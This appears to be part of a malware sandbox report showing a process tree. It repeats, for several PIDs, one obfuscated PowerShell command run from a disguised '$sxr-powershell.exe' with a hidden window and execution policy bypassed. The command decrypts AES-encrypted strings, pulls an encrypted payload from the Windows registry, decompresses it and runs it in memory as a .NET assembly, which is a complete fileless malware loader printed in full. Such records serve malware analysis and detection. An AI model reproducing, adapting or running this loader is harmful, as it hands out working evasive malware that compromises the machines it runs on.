[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:5200
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:5456
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:4020
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:6112
        
        C:\Windows\$sxr-powershell.exe
        
